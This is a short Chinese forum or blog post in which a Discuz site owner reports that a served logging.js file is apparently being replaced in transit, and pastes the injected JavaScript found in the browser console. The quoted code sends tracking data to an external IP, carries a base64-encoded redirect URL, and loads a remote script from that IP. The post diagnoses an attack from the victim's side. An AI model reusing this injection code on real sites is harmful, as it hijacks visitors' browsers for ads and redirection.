发现一个怪问题,服务器上的js文件内容正常,但访问时却被恶意替换?
程序员文章站
2022-05-23 18:35:37
...
我是在国外主机上布置的一个discuz论坛,之前都好好的,这些天访问的时候发现有弹出窗口被阻止,第一反应是网站被植入代码了,但查看源码也没发现可疑的代码,后来就一个个的把script排除,最后只剩下一个logging.js文件,但下载下来后和原版的对比是一样的,里面就是声明了两个函数而已,所以很明显也不是这个文件代码的问题,接着用chrome的控制台测试,就发现了这个很奇怪的问题,logging.js这个文件的内容居然是
var _objparam_51_ = new Object;_objparam_51_.p = 1;_objparam_51_.aid = 66;_objparam_51_.stat = 'http://76.73.85.179/stat/img.php?type=2&p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=14&area=440900&uid=41044&ucid=1';_objparam_51_.expires = 10;_objparam_51_.oldurl = 'http://我的网站域名/static/js/logging.js?3NE&W2Ce79=4';_objparam_51_.url = 'aHR0cDovL3d3dy5sZnR5eC5jb20vYTE5NTMzOC5waHA/VzJDZTc5PTQmcD0xMzcwNjAxNTA1JmM9MTkwMTk4ODkzOQ==';window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);window.setTimeout(function(){var a=document.createElement("script");a.src="http://76.73.85.179/js/v1.js";document.getElementsByTagName("head")[0].appendChild(a);},0);声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
上一篇: main.php